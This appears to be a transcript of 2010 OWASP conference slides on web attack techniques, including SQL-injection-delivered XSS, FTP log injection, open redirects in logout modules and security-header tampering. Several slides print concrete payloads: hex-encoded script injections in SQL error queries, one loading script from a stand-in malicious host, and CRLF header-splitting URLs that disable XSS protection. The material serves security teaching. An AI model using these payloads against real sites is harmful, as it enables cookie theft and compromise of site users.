Bug-Alcoholic 2.0 - Untamed World of Web Vulnerabilities · All contents of this presentation...
Transcript of Bug-Alcoholic 2.0 - Untamed World of Web Vulnerabilities · All contents of this presentation...
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation
OWASP
http://www.owasp.org
Bug-Alcoholic 2.0 - Untamed World of Web Vulnerabilities
Aditya K Sood
SecNiche Security Labs
Sr. Security Practitioner, Armorize
adi_ks [at] secniche.org
AppSec 2010, University of California Irvine, CA, USA
September 10, 2010
OWASP 2
Disclaimer
All contents of this presentation represent my own beliefs and views and do not,
unless explicitly stated otherwise, represent the beliefs of my current, or any of my
previous in that effect, employers.
Dependency
Web penetration testing plays a critical role in assessing the applied security.
Vulnerabilities in deployed products matter a lot.
Testing output depends on exploitation of existing issues and discovering flaws.
Attack classification remains same but modus operandi of attack varies
Testing requires creation of attack surface.
OWASP 3
About Me
Founder , SECNICHE Security Labs.
http://www.secniche.org
PhD Candidate at Michigan State University.
Senior Security Practitioner , Armorize
http://www.armorize.com
Worked previously for COSEINC as Senior Security Researcher and Security
Consultant for KPMG
Author for HITB E-Zine, Hakin9 ,ELSEVIER, USENIX Journals.
Likes to do Bug Hunting and Malware dissection.
Released Advisories to Forefront Companies.
Active Speaker at Security Conferences including RSA etc.
Blog: http://zeroknock.blogspot.com
OWASP 4
Notification
All the vulnerabilities discussed in this talk are in the process of
patching.
This discussion is all about understanding the attack methods and using them further in a real time environment.
All for learning and education purposes.
OWASP 5
Agenda
Web 2.0 – Walkthrough
Web 2.0 – The real world
Web 2.0 trends ( vulnerability classification, browsers state)
Web 2.0 – Exploitation shift
Web Application Security is not a separate component !
Web Vulnerability Hunting(Exemplary) – Cross Interface Attacks (CIA) / attacking backend login consoles /
– SQLXSSI – Fusion { XSS, SQL } / XSS payload in SQL parameters /
– Document rendering attacks / exploiting content transformation /
– Web widgets interface flaws / testing mini web play ground/
– Persistent redirection attacks /exploiting logout modules/
– Declarative security manipulation / tampering browsers/
– Insecure Content inclusion / exploitation by behavior /
Conclusion
OWASP 6
Web 2.0 – The Present World
Components in real world
OWASP 7
Web Trends – Incidents Classification
Top Web incidents/trends of 2009 /predictions for 2010
© stats by Breach
OWASP 8
Web Trends – Vulnerability Classes
Web vulnerability classification - 2009
© website stats by Cenzic
OWASP 9
Web Trends – Exploited Browsers
Web vulnerability classification - 2009
© stats by Cenzic
OWASP 10
Web 2.0 – Exploitation Shift
Why ? System vulnerabilities are getting harder to exploit
Web 2.0 service platforms
Client side exploitation – easy control through browsers
Origin of Web as a service standard
Increased business dependency on web 2.0
Centralized platform for content sharing from different resources
Online social networking
Wider window of exploitation through web
Information gathering about targets is easy on web
OWASP 11
Web Application – Security Is Not Separate !
Robust Web Application
Reliability
Privacy
Security
Design
Development
OWASP 12
Web Application Vulnerability Hunting
Pillars Design and Development
Attack and Exploitation
Patching and Rebuilding
OWASP 13
Cross Interface Attacks (CIA)
Hardware devices using admin interfaces.
Admin interfaces : { Web, FTP, Telnet}
Do we require all admin interfaces ? If web admin is allowed, so what about backend consoles!
Is URL restriction a good practice?
Is it advantageous to have backend consoles?
Does access control serves well?
CIA targets FTP/Telnet admin consoles.
Step by step developing an attack surface.
Hardware devices – firewalls, disk stations,
management systems etc
OWASP 14
Cross Interface Attacks (CIA)
Attack base and considerations Presence of FTP/Telnet admin login console
Hardware appliances have default error logging mechanism
Log interfaces are served in HTML without filtering
A bad design practice from security point of view
Protocol such as FTP/Telnet default nature helps in information gathering
FTP Truth
Collective username and password authentication
Followed to avoid enumeration of user accounts
No check on login attempts. No check on characters.
Usually, accessible widely.
– Do you think access control is required?
OWASP 15
Cross Interface Attacks (CIA)
Attacking and testing Gathering information about allowed characters
No aim to get authenticated
– FTP 530 Login Incorrect is what we require.
Malicious payloads are used as username and password
– Injections / Scripts / Iframes / DOM Calls / Persistent Payloads
– Inject what ever you want !
– Good point for triggering CSRF attacks
Of-course , Authentication failure. Error gets logged.
Payloads become persistent. It can be reflective.
Bad design practice – Unencoded / Unfiltered HTML rendering
– Inappropriate web logging mechanism
Viola ! Something happens.
OWASP 16
Cross Interface Attacks (CIA)
Scrutinizing default buffer To determine the number of characters that are allowed
Supplying excess of buffer in FTP_USER_NAME input
FTP_PASS_WORD reflects the allowed FTP_USER_NAME
Injection points – {FTP_USER_NAME , FTP_PASS_WORD}
OWASP 17
Cross Interface Attacks (CIA)
Injecting payloads Supplying payloads as credentials
Input points – {FTP_USER_NAME , FTP_PASS_WORD}
OWASP 18
Cross Interface Attacks (CIA)
What else? Anything
Irrespective of user’s environment { OS /Browser etc }
OWASP
Differential attack surface How far we can go in using the standard vulnerabilities?
How many different ways of exploitation can be developed?
Why not fusing one vulnerability into another ?
Its’ all about game of payloads
Triggering XSS through SQL Injection All types of XSS possibilities
Verbose SQLI vulnerability is the base
Errors with truncated SQL queries with parameters
XSS payloads injected in SQL parameters
Obfuscating payloads
Basically, an XSS injection using database semantics
Reflective in nature
19
SQLXSSI: Fusion {XSS , SQLI}
OWASP
Generalized pattern <script>alert(document.cookie)</script> =
0x3c7363726970743e616c65727428646f63756d656e742e636f6f6b6965293c2f736
3726970743e
20
SQLXSSI: Fusion {XSS , SQLI}
http://vulnerable.com/web_page/index.php?id=1and(select1from(selectcount(*),concat(0x3c73
63726970743e616c657274282f73636861702f293c2f7363726970743e,floor(rand(0)*2)) x
from table-name groupby x)a)
<script src="http://wwww.malicious.org/ex.js" />=
3c736372697074207372633d22687474703a2f2f777777772e6d616c6963696f75732
e6f72672f65782e6a7322202f3e
http://vulnerable.com/web_page/index.php?id=1and(select1from(selectcount(*),concat(0x
3c736372697074207372633d22687474703a2f2f777777772e6d616c6963696f75732e6f72672f
65782e6a7322202f3e,floor(rand(0)*2)) x from table-name groupby x)a)
OWASP 21
SQLXSSI: Fusion {XSS , SQLI} – Example (1)
Error gets rendered in browser
OWASP 22
SQLXSSI: Fusion {XSS , SQLI} – Example (2)
Injected XSS Payload in SQL parameter
OWASP 23
SQLXSSI: Fusion {XSS , SQLI} – Example (3)
Injected payload starts downloading malicious XLS file
OWASP 24
SQLXSSI: Fusion {XSS , SQLI} – Example (4)
Image with malicious request is injected
OWASP
Real world! Websites are getting more susceptible to these issues
Vulnerability ratio exceeds to 1:2
So what ! One vulnerability can lead to another. Testing is inadvertent.
SQLI can be used in a differential manner
Advanced step in conducting XSS through SQLI
Database design matters
25
SQLXSSI: Fusion {XSS , SQLI}
Thanks to RB (1337) (http://www.schap.org) for initiating this type of attack surface
OWASP 26
Document Rendering Attacks
Concept Inability of existing filters used for content transformation
Inappropriate design of web applications
Mistake – using browser as editors for content rendering
Do you want to upload you resume in MSWord?
Attack vector Setting payloads as inline URL links in the Office
documents
Document is required to be viewed. Preview properties.
Persistent in nature primarily. User interaction is required.
MSWord, PowerPoint etc all work well depending on the web application
Bypassing XSS filters through Office documents http://www.secniche.org/papers/SNS_09_01_Evad_Xss_Filter_Msword.pdf
OWASP 27
Document Rendering Attacks
Payload is injected as Hyperlink
OWASP 28
Document Rendering Attacks
The document is edited in the enterprise web application
OWASP 29
Document Rendering Attacks
Exploited
OWASP 30
Document Rendering Attacks
Case Study
XML based authoring flaws
Vulnerability reported in SCRIBD platform in 2009
Reported and patched
Scribd failed to implement a filter on payload set in protocol handlers
Links directly injected and converted to XML
Lastly, compiled and displayed in flash player
IPaper Platform XML based Link Authoring Flaw – Scribd http://coseinc.com/en/index.php?rt=download&act=publication&file=design_inaccuracy_i
nside_ipaper_framework.pdf
OWASP 31
XML Authoring Flaw – Case Study
XML working model
OWASP 32
XML Authoring Flaw – Case Study (Example)
OWASP 33
Web Widget Interface Flaws
What lies beneath?
Web widget
A snippet of HTML code embedded in the website. You can "copy" that code and "embed" in your web page
Gadget is proprietary where as widget is freely available
Diverse functionalities – advertisements, traffic analysis , news, feeds , etc
Web widget code snippets
JavaScript
Adobe Flash plugins
Code for embedding Windows Media player
Silverlight plugins
OWASP 34
Web Widget Interface Flaws
Insecurities
Code specification issues
A widget or gadget can be designed insecurely
HTTP parameters play a crucial role in working
Arbitrary code execution in OS – Scripting interface
Unsanitized, unfiltered, unverified data acceptability
Interface with websites and triggering vulnerabilities
Understanding the design of widget
Widget interface with the primary website and how it works
Registered widget and domain names in database can cause security problems in the base website
OWASP 35
Web Widget Interface Flaws
Web widget working layout
The model looks simplistic in nature.
OWASP 36
Web Widget Interface Flaws
Case Study
Real time issue in one of most recognized vendor – The website is a leading service provider for news and
advertisements
– The widget is allowed to install on any custom blog or user website after the registration process. The widget code is changed based on the platform such as blogger , MySpace etc
– Once the registration is done, the widget snippet is provided to the user or customer for inclusion in his/her website
– Now the content provider has a URL which redirects traffic from the primary website to the registered blog.
A very bad design practice.
OWASP 37
Web Widget Interface Flaws
Attack scenario
Details » Attacker registers his malicious blog with that content
provider
» Once it is registered, the widget is allowed to be included in the attacker controlled website
» Attacker starts using the content provider link to redirect traffic to his blog and making victims vulnerable.
OWASP 38
Persistent Redirection Attacks
HTTP Redirection Automated redirection
What If attacker controls
More effective – if persistent
OWASP 39
Persistent Redirect Attacks
Manipulating Logout Module
Details » Enterprise application inbuilt functionality to provide a pre
login parameter for inline redirection back to application home page while logging out of the application
» Careful analysis and design scrutinization helps tester to find parameters which provide a persistent state to set your value
» The application does not verifies the value provided in the redirect variable while logging into the application
» Another variation of login redirection attacks, this one is logout redirection attacks
HackintheBox (HITB) EZine – Open Redirect Wreck Off Paper
http://magazine.hackinthebox.org/issues/HITB-Ezine-Issue-002.pdf
OWASP 2010
A9
OWASP 40
Persistent Redirection Attacks
Manipulating Logout Module
Layout – Vulnerability at disclosed to one of the biggest vendor
– Successfully exploited and triggered in a large number of applications
– When a above stated URL is used to login into application, the value of kk_home_url variable becomes persisted.
https://www.example.com/XXX_YYYY/ret.jsp?_pc=STANDARD_WEB_PAGE_STAT
&_pi=1800&kk_home_url=http://www.malicious.org
OWASP 41
Declarative Security Manipulation
Concept
Operation - Idea – The declarative model provides an extensible set of security
parameters in the HTTP responses
– Browsers can respond with a requested security mechanism
– Declared by the developer as part of the web server or application running on the server. In this way, declarative security can provide both a portable and flexible security defense
Why declarative security in http response headers – ClickJacking attacks
– XSS filtering issues
– File downloading security
– HTML content rendering
OWASP 42
Declarative Security Manipulation
HTTP response headers Clickjacking
– X-FRAME-OPTIONS {SAMEORIGIN / DENY}
» Don’t allow the website to be framed
» Browser automatically escape the framing
– X-XSS-PROTECTION { 0 – Disable| 1- Enable}
» Triggers inbuilt IE XSS protection
» Nothing much to say about its insecurity
– X-CONTENT-TYPE-OPERATIONS{ NOSNIFF}
» Preventing script execution through images
» Secure MIME interpretation
– X-DOWNLOAD-OPTIONS{ NOOPEN}
» Disallowing opening of files on internet
Applied as HTTP response headers– HTTP response splitting attacks work appropriately ( %0d%0a)
OWASP 43
Declarative Security - Study
http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-XSS-Protection:0
%0d%0a%0d%0a<html><body><script>alert(‘0wned')</script></body></html>
http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-Download-Open:
%0d%0a%0d%0a<html><body><script>alert(‘0wned')</script></body></html>
http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-Frame-Options:0 [No
value] %0d%0a%0d%0a<html><body><script>alert(‘0wned')</script></body></html>
http://www.vulnerable.com/tamper.pl?url=temp1%3dparam1;%0d%0aX-Content-Type-
Options:[no Value]
%0d%0a%0d%0a<html><body><script>alert(‘0wned')</script></body></html>
Provide any falisfied value to bedazzle the real working of security component in a
browser.
Generic attack styles
OWASP 44
Declarative Security - Study
Feasibility study Implementation of DS in real world
To understand the scenario
To understand the adaptability
To estimate the risk to websites
Paper released at Usenix CollSec (Collaborative Methods of Security and Privacy ) :http://www.usenix.org/events/collsec10/tech/full_papers/Sood.pdf
OWASP 45
Declarative Security - Study
Feasibility study Alex top 1000 website responses
Google’s GWS implements the most
Paper released at Usenix CollSec (Collaborative Methods of Security and Privacy ) :http://www.usenix.org/events/collsec10/tech/full_papers/Sood.pdf
OWASP 46
Content Delivery Networks – Stringency
Content from third party Online advertisements
Video streaming content
Windows Media files (MP4, MP3) /Quick time
Embedded Flash files
Inline frames used for rendering contents
EMBED / OBJECT/ FRAME – HTML/DOM supporting elements
OWASP 47
Content Delivery Networks – Stringency
Web 2.0 requirement
OWASP 48
Content Delivery Networks – Stringency
Example – A malicious media player file can infect victims with malware once included from third party content network
Easy to bypass filter
Setting the Payload
Payload bypasses XSS filter and starts
downloading XLS file
OWASP 49
WWW Vulnerabilities - Circle
Evolving complex Technology
Complex Flaws Efficient Hacks
Testing and Strengthening
OWASP 50
Conclusion
Attacks on web infrastructure are increasing
More complexity more problems
Security is a process and not a one time shot
Design according to requirement
Test appropriately
OWASP 51
Questions and Knowledge Sharing
OWASP 52
Demonstrations - Available If Required
Shared on Individual Front.
OWASP 53
Thanks
OWASP (http://www.owasp.org )
SecNiche Security (http://www.secniche.org )